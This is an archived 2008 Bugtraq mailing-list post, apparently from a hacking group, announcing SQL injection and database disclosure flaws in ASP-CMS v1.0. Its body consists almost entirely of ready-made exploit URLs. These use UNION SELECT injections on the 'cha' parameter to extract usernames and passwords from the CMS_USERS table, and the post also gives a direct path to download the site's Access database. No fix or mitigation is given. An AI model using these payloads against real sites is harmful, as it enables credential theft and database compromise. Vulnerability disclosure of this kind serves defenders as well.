ASP-CMS v.1.0 Sql Injection/Database Disclosure

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: ASP-CMS v.1.0 Sql Injection/Database Disclosure
From: r3d.w0rm@xxxxxxxxx
Date: Thu, 11 Dec 2008 13:12:51 -0700
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

#####################################################################################
####              ASP-CMS v.1.0 Sql Injection/Database Disclosure               
 ####
#####################################################################################
#                                                                               
    #
#AUTHOR : Sina Yazdanmehr (R3d.W0rm)                                            
    #
#Discovered by : Sina Yazdanmehr (R3d.W0rm)                                     
    #
#Our Site : Http://IRCRASH.COM                                                  
    #
#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi   
    #
#####################################################################################
#                                                                               
    #
#Download : 
http://puzzle.dl.sourceforge.net/sourceforge/asp-cms/asp-cms.18-12-04.zip
#                                                                               
    #
#DORK : :(                                                                      
    #
#                                                                               
    #
#####################################################################################
#                                 [Sql Injection]                               
    #
#                                                                               
    #
#Username : 
http://Site/[path]/index.asp?cha=-999%20union%20select%200,1,user_username,3,4,5,6,7,8,9,10%20from%20CMS_USERS
#                                                                               
    #
#Password : 
http://Site/[path]/index.asp?cha=-999%20union%20select%200,1,user_password,3,4,5,6,7,8,9,10%20from%20CMS_USERS
#                                                                               
    #
#####################################################################################
#                               [Database Disclosure]                           
    #
#                                                                               
    #
#http://Site/[path]/mdb-database/ASP-CMS_v100.mdb                               
    #
#                                                                               
    #
#####################################################################################
#                           Site : Http://IRCRASH.COM                           
    #
###################################### TNX GOD 
######################################

Prev by Date: Re: Re: Multiple XSRF in DD-WRT (Remote Root Command Execution)
Next by Date: rPSA-2008-0336-1 tshark wireshark
Previous by thread: Secunia Research: CA ARCserve Backup RPC "handle_t" Argument Vulnerability
Next by thread: rPSA-2008-0336-1 tshark wireshark
Index(es):
- Date
- Thread